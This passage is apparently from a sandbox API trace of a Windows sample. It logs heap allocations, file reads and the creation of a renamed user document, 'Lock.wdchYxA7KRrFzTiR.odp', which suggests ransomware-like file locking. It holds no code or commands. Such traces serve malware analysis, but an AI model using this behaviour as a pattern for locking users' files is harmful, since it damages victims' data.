HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854650 | out: hHeap=0x2af0000) returned 1 [0221.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0221.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0221.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0221.733] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.wdchYxA7KRrFzTiR.odp" (normalized: "c:\\users\\fd1hvy\\documents\\lock.wdchyxa7krrfztir.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0221.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0221.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0221.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0221.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0221.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0221.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0221.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0221.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0221.734] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0221.734] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0221.734] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0221.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0221.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0221.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0221.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0221.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0221.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0221.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0221.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54ee020 [0221.742] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0221.742] ReadFile (in: hFile=0x50c, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x318d, lpOverlapped=0x0) returned 1 [0221.743] ReadFile (in: hFile=0x50c, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0221.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0221.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0221.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0221.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x318d) returned 0x2a8a138 [0221.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54ee020 | out: hHeap=0x2af0000) returned 1 [0221.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0221.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0221.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0221.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0221.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0221.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0221.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x318d) returned 0x2a8d2d0 [0221.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0221.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0221.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0221.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0221.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0221.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0221.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0221.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x318d) returned 0x2a8a138 [0221.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0221.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0221.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0221.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0221.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0221.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0221.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0221.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0221.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0221.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0221.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0221.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0221.748] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0221.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0221.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x318d) returned 0x2a8a138 [0221.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0221.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0221.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0221.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0221.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0221.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x318d) returned 0x2a90468 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0221.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0221.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0221.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0221.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0221.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0221.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0221.750] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0221.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0221.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0221.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0221.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0221.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0221.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0221.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0221.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0221.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0221.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0221.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0221.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0221.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0221.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0221.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0221.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0221.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0221.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0221.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 